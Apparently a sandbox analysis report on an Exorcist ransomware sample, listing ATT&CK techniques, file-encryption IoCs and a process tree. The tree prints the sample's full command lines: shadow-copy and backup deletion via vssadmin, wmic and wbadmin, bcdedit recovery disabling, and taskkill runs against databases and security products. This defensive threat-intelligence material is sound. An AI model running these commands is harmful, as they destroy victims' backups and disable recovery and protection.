exorcist | d7d0688022b5848caf5cbabc1bde628cb74f32e014311f5299ed63241fff72b0

Exorcist Ransomware
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
ransomware exorcist
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2836	bcdedit.exe
496	bcdedit.exe

Deletes System State backups 3 TTPs 2 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
3524	wbadmin.exe
3104	wbadmin.exe

Modifies extensions of user files 28 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\ResetImport.png.UyFHkQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\MountEnter.tiff	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\MountEnter.tiff.UyFHkQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\OptimizeBlock.tif.UyFHkQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\OptimizeBlock.tif => C:\Users\Admin\Pictures\OptimizeBlock.tif.UyFHkQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\ResetLimit.crw.UyFHkQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\ConvertFromUninstall.png.UyFHkQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\DisconnectWrite.tiff	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\DismountJoin.raw => C:\Users\Admin\Pictures\DismountJoin.raw.UyFHkQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\ResetImport.png => C:\Users\Admin\Pictures\ResetImport.png.UyFHkQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\ResetLimit.crw => C:\Users\Admin\Pictures\ResetLimit.crw.UyFHkQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\CheckpointSave.crw => C:\Users\Admin\Pictures\CheckpointSave.crw.UyFHkQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\ConvertFromUninstall.png => C:\Users\Admin\Pictures\ConvertFromUninstall.png.UyFHkQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\MountEnter.tiff => C:\Users\Admin\Pictures\MountEnter.tiff.UyFHkQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\DismountJoin.raw.UyFHkQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\RenameConfirm.raw.UyFHkQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\FormatPop.png => C:\Users\Admin\Pictures\FormatPop.png.UyFHkQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\FormatPop.png.UyFHkQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\SwitchRequest.raw => C:\Users\Admin\Pictures\SwitchRequest.raw.UyFHkQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\WaitAssert.tif => C:\Users\Admin\Pictures\WaitAssert.tif.UyFHkQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\CheckpointSave.crw.UyFHkQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\DisconnectWrite.tiff => C:\Users\Admin\Pictures\DisconnectWrite.tiff.UyFHkQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\DisconnectWrite.tiff.UyFHkQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\SwitchRequest.raw.UyFHkQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\WaitAssert.tif.UyFHkQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\RenameConfirm.raw => C:\Users\Admin\Pictures\RenameConfirm.raw.UyFHkQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\SuspendInstall.raw => C:\Users\Admin\Pictures\SuspendInstall.raw.UyFHkQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\SuspendInstall.raw.UyFHkQ	build-x64-crypt.bin.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	build-x64-crypt.bin.exe
File opened (read-only)	\??\K:	build-x64-crypt.bin.exe
File opened (read-only)	\??\M:	build-x64-crypt.bin.exe
File opened (read-only)	\??\N:	build-x64-crypt.bin.exe
File opened (read-only)	\??\R:	build-x64-crypt.bin.exe
File opened (read-only)	\??\T:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Z:	build-x64-crypt.bin.exe
File opened (read-only)	\??\B:	build-x64-crypt.bin.exe
File opened (read-only)	\??\F:	build-x64-crypt.bin.exe
File opened (read-only)	\??\G:	build-x64-crypt.bin.exe
File opened (read-only)	\??\L:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Q:	build-x64-crypt.bin.exe
File opened (read-only)	\??\U:	build-x64-crypt.bin.exe
File opened (read-only)	\??\I:	build-x64-crypt.bin.exe
File opened (read-only)	\??\O:	build-x64-crypt.bin.exe
File opened (read-only)	\??\P:	build-x64-crypt.bin.exe
File opened (read-only)	\??\S:	build-x64-crypt.bin.exe
File opened (read-only)	\??\V:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Y:	build-x64-crypt.bin.exe
File opened (read-only)	\??\A:	build-x64-crypt.bin.exe
File opened (read-only)	\??\H:	build-x64-crypt.bin.exe
File opened (read-only)	\??\J:	build-x64-crypt.bin.exe
File opened (read-only)	\??\W:	build-x64-crypt.bin.exe
File opened (read-only)	\??\X:	build-x64-crypt.bin.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d.bmp"	build-x64-crypt.bin.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
644	timeout.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
3760	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
1312	taskkill.exe
1228	taskkill.exe
3260	taskkill.exe
1188	taskkill.exe
3880	taskkill.exe
2936	taskkill.exe
1652	taskkill.exe
364	taskkill.exe
1224	taskkill.exe
276	taskkill.exe
492	taskkill.exe
1216	taskkill.exe
2572	taskkill.exe
2056	taskkill.exe
2128	taskkill.exe
1048	taskkill.exe
1188	taskkill.exe
2680	taskkill.exe
2108	taskkill.exe
1604	taskkill.exe
2148	taskkill.exe
3760	taskkill.exe
1100	taskkill.exe
416	taskkill.exe
3764	taskkill.exe
1188	taskkill.exe
2480	taskkill.exe
492	taskkill.exe
2484	taskkill.exe
2228	taskkill.exe
2072	taskkill.exe
3156	taskkill.exe
420	taskkill.exe
1000	taskkill.exe
3880	taskkill.exe
2480	taskkill.exe
900	taskkill.exe
60	taskkill.exe
564	taskkill.exe
2044	taskkill.exe
2956	taskkill.exe
2108	taskkill.exe
996	taskkill.exe
260	taskkill.exe
3684	taskkill.exe
3232	taskkill.exe
1844	taskkill.exe
2572	taskkill.exe
1100	taskkill.exe
276	taskkill.exe
996	taskkill.exe
2728	taskkill.exe
1604	taskkill.exe
1800	taskkill.exe
2228	taskkill.exe
3524	taskkill.exe
2836	taskkill.exe
252	taskkill.exe
1184	taskkill.exe
3760	taskkill.exe
3856	taskkill.exe
808	taskkill.exe
3208	taskkill.exe
280	taskkill.exe

NTFS ADS 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:xbcqjlijd	build-x64-crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:iykxevszimranzpu	build-x64-crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:xbcqjlijd	build-x64-crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:ivrhwmenumbuocvak	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:tpupnbvzicwro	build-x64-crypt.bin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3832	WMIC.exe
Token: SeSecurityPrivilege	3832	WMIC.exe
Token: SeTakeOwnershipPrivilege	3832	WMIC.exe
Token: SeLoadDriverPrivilege	3832	WMIC.exe
Token: SeSystemProfilePrivilege	3832	WMIC.exe
Token: SeSystemtimePrivilege	3832	WMIC.exe
Token: SeProfSingleProcessPrivilege	3832	WMIC.exe
Token: SeIncBasePriorityPrivilege	3832	WMIC.exe
Token: SeCreatePagefilePrivilege	3832	WMIC.exe
Token: SeBackupPrivilege	3832	WMIC.exe
Token: SeRestorePrivilege	3832	WMIC.exe
Token: SeShutdownPrivilege	3832	WMIC.exe
Token: SeDebugPrivilege	3832	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3832	WMIC.exe
Token: SeRemoteShutdownPrivilege	3832	WMIC.exe
Token: SeUndockPrivilege	3832	WMIC.exe
Token: SeManageVolumePrivilege	3832	WMIC.exe
Token: 33	3832	WMIC.exe
Token: 34	3832	WMIC.exe
Token: 35	3832	WMIC.exe
Token: 36	3832	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3832	WMIC.exe
Token: SeSecurityPrivilege	3832	WMIC.exe
Token: SeTakeOwnershipPrivilege	3832	WMIC.exe
Token: SeLoadDriverPrivilege	3832	WMIC.exe
Token: SeSystemProfilePrivilege	3832	WMIC.exe
Token: SeSystemtimePrivilege	3832	WMIC.exe
Token: SeProfSingleProcessPrivilege	3832	WMIC.exe
Token: SeIncBasePriorityPrivilege	3832	WMIC.exe
Token: SeCreatePagefilePrivilege	3832	WMIC.exe
Token: SeBackupPrivilege	3832	WMIC.exe
Token: SeRestorePrivilege	3832	WMIC.exe
Token: SeShutdownPrivilege	3832	WMIC.exe
Token: SeDebugPrivilege	3832	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3832	WMIC.exe
Token: SeRemoteShutdownPrivilege	3832	WMIC.exe
Token: SeUndockPrivilege	3832	WMIC.exe
Token: SeManageVolumePrivilege	3832	WMIC.exe
Token: 33	3832	WMIC.exe
Token: 34	3832	WMIC.exe
Token: 35	3832	WMIC.exe
Token: 36	3832	WMIC.exe
Token: SeBackupPrivilege	1552	vssvc.exe
Token: SeRestorePrivilege	1552	vssvc.exe
Token: SeAuditPrivilege	1552	vssvc.exe
Token: SeDebugPrivilege	1312	taskkill.exe
Token: SeDebugPrivilege	1652	taskkill.exe
Token: SeDebugPrivilege	3856	taskkill.exe
Token: SeDebugPrivilege	3008	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	2728	taskkill.exe
Token: SeDebugPrivilege	2072	taskkill.exe
Token: SeDebugPrivilege	500	taskkill.exe
Token: SeDebugPrivilege	808	taskkill.exe
Token: SeDebugPrivilege	60	taskkill.exe
Token: SeDebugPrivilege	1228	taskkill.exe
Token: SeDebugPrivilege	1604	taskkill.exe
Token: SeDebugPrivilege	1800	taskkill.exe
Token: SeDebugPrivilege	3208	taskkill.exe
Token: SeDebugPrivilege	2224	taskkill.exe
Token: SeDebugPrivilege	2836	taskkill.exe
Token: SeDebugPrivilege	564	taskkill.exe
Token: SeDebugPrivilege	416	taskkill.exe
Token: SeDebugPrivilege	3824	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3676 wrote to memory of 1892	3676	build-x64-crypt.bin.exe	68
PID 3676 wrote to memory of 1892	3676	build-x64-crypt.bin.exe	68
PID 1892 wrote to memory of 3832	1892	cmd.exe	70
PID 1892 wrote to memory of 3832	1892	cmd.exe	70
PID 3676 wrote to memory of 3280	3676	build-x64-crypt.bin.exe	74
PID 3676 wrote to memory of 3280	3676	build-x64-crypt.bin.exe	74
PID 3280 wrote to memory of 3524	3280	cmd.exe	76
PID 3280 wrote to memory of 3524	3280	cmd.exe	76
PID 3676 wrote to memory of 3100	3676	build-x64-crypt.bin.exe	77
PID 3676 wrote to memory of 3100	3676	build-x64-crypt.bin.exe	77
PID 3100 wrote to memory of 3104	3100	cmd.exe	79
PID 3100 wrote to memory of 3104	3100	cmd.exe	79
PID 3676 wrote to memory of 1692	3676	build-x64-crypt.bin.exe	80
PID 3676 wrote to memory of 1692	3676	build-x64-crypt.bin.exe	80
PID 1692 wrote to memory of 2836	1692	cmd.exe	82
PID 1692 wrote to memory of 2836	1692	cmd.exe	82
PID 3676 wrote to memory of 416	3676	build-x64-crypt.bin.exe	83
PID 3676 wrote to memory of 416	3676	build-x64-crypt.bin.exe	83
PID 416 wrote to memory of 496	416	cmd.exe	85
PID 416 wrote to memory of 496	416	cmd.exe	85
PID 3676 wrote to memory of 3824	3676	build-x64-crypt.bin.exe	86
PID 3676 wrote to memory of 3824	3676	build-x64-crypt.bin.exe	86
PID 3824 wrote to memory of 3760	3824	cmd.exe	88
PID 3824 wrote to memory of 3760	3824	cmd.exe	88
PID 3676 wrote to memory of 900	3676	build-x64-crypt.bin.exe	89
PID 3676 wrote to memory of 900	3676	build-x64-crypt.bin.exe	89
PID 900 wrote to memory of 1040	900	cmd.exe	91
PID 900 wrote to memory of 1040	900	cmd.exe	91
PID 3676 wrote to memory of 1204	3676	build-x64-crypt.bin.exe	92
PID 3676 wrote to memory of 1204	3676	build-x64-crypt.bin.exe	92
PID 1204 wrote to memory of 1312	1204	cmd.exe	94
PID 1204 wrote to memory of 1312	1204	cmd.exe	94
PID 3676 wrote to memory of 3232	3676	build-x64-crypt.bin.exe	95
PID 3676 wrote to memory of 3232	3676	build-x64-crypt.bin.exe	95
PID 3232 wrote to memory of 1652	3232	cmd.exe	97
PID 3232 wrote to memory of 1652	3232	cmd.exe	97
PID 3676 wrote to memory of 276	3676	build-x64-crypt.bin.exe	98
PID 3676 wrote to memory of 276	3676	build-x64-crypt.bin.exe	98
PID 276 wrote to memory of 3856	276	cmd.exe	100
PID 276 wrote to memory of 3856	276	cmd.exe	100
PID 3676 wrote to memory of 3468	3676	build-x64-crypt.bin.exe	101
PID 3676 wrote to memory of 3468	3676	build-x64-crypt.bin.exe	101
PID 3468 wrote to memory of 3008	3468	cmd.exe	103
PID 3468 wrote to memory of 3008	3468	cmd.exe	103
PID 3676 wrote to memory of 680	3676	build-x64-crypt.bin.exe	104
PID 3676 wrote to memory of 680	3676	build-x64-crypt.bin.exe	104
PID 680 wrote to memory of 1956	680	cmd.exe	106
PID 680 wrote to memory of 1956	680	cmd.exe	106
PID 3676 wrote to memory of 3692	3676	build-x64-crypt.bin.exe	107
PID 3676 wrote to memory of 3692	3676	build-x64-crypt.bin.exe	107
PID 3692 wrote to memory of 2728	3692	cmd.exe	109
PID 3692 wrote to memory of 2728	3692	cmd.exe	109
PID 3676 wrote to memory of 2176	3676	build-x64-crypt.bin.exe	110
PID 3676 wrote to memory of 2176	3676	build-x64-crypt.bin.exe	110
PID 2176 wrote to memory of 2072	2176	cmd.exe	112
PID 2176 wrote to memory of 2072	2176	cmd.exe	112
PID 3676 wrote to memory of 2144	3676	build-x64-crypt.bin.exe	113
PID 3676 wrote to memory of 2144	3676	build-x64-crypt.bin.exe	113
PID 2144 wrote to memory of 500	2144	cmd.exe	115
PID 2144 wrote to memory of 500	2144	cmd.exe	115
PID 3676 wrote to memory of 3772	3676	build-x64-crypt.bin.exe	116
PID 3676 wrote to memory of 3772	3676	build-x64-crypt.bin.exe	116
PID 3772 wrote to memory of 808	3772	cmd.exe	118
PID 3772 wrote to memory of 808	3772	cmd.exe	118

C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe
"C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe"
1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3676
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C wmic.exe SHADOWCOPY DELETE /nointeractive
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1892
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic.exe SHADOWCOPY DELETE /nointeractive
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3832
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3280
- - C:\Windows\system32\wbadmin.exe
    wbadmin DELETE SYSTEMSTATEBACKUP
    3⤵
    - Deletes System State backups
    - Drops file in Windows directory
    PID:3524
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3100
- - C:\Windows\system32\wbadmin.exe
    wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
    3⤵
    - Deletes System State backups
    - Drops file in Windows directory
    PID:3104
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C bcdedit.exe /set {default} recoveryenabled No
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1692
- - C:\Windows\system32\bcdedit.exe
    bcdedit.exe /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2836
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:416
- - C:\Windows\system32\bcdedit.exe
    bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:496
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3824
- - C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:3760
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C C:\Windows\system32\vssvc.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:900
- - C:\Windows\system32\VSSVC.exe
    C:\Windows\system32\vssvc.exe
    3⤵
    PID:1040
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM wxServer*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1204
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM wxServer*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1312
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM QBFCService*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3232
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBFCService*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1652
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM QBVSS*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:276
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBVSS*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3856
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM sql*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3468
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sql*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3008
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM msaccess*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:680
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM msaccess*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1956
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM mssql*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3692
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM mssql*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2728
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM mysql*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2176
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM mysql*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2072
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM wxServerView*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2144
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM wxServerView*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:500
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM sqlmangr*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3772
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sqlmangr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:808
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM RAgui*
  2⤵
  PID:1048
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM RAgui*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:60
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM supervise*
  2⤵
  PID:1424
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM supervise*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1228
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM Culture*
  2⤵
  PID:256
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Culture*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1604
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM Defwatch*
  2⤵
  PID:3844
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Defwatch*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1800
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM winword*
  2⤵
  PID:3056
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM winword*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3208
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM QBW32*
  2⤵
  PID:3260
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBW32*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2224
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM QBDBMgr*
  2⤵
  PID:3156
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBDBMgr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2836
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM qbupdate*
  2⤵
  PID:2956
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM qbupdate*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:564
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM axlbridge*
  2⤵
  PID:1544
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM axlbridge*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:416
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM httpd*
  2⤵
  PID:496
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM httpd*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3824
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM fdlauncher*
  2⤵
  PID:664
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM fdlauncher*
    3⤵
    - Kills process with taskkill
    PID:3764
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM MsDtSrvr*
  2⤵
  PID:1212
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MsDtSrvr*
    3⤵
    - Kills process with taskkill
    PID:364
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM java*
  2⤵
  PID:1584
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM java*
    3⤵
    - Kills process with taskkill
    PID:1224
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM 360se*
  2⤵
  PID:2980
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM 360se*
    3⤵
    - Kills process with taskkill
    PID:3232
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM 360doctor*
  2⤵
  PID:1772
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM 360doctor*
    3⤵
    - Kills process with taskkill
    PID:280
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM wdswfsafe*
  2⤵
  PID:3872
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM wdswfsafe*
    3⤵
    PID:1892
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM fdhost*
  2⤵
  PID:2116
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM fdhost*
    3⤵
    PID:2500
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM GDscan*
  2⤵
  PID:3908
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM GDscan*
    3⤵
    - Kills process with taskkill
    PID:2044
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM ZhuDongFangYu*
  2⤵
  PID:2112
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM ZhuDongFangYu*
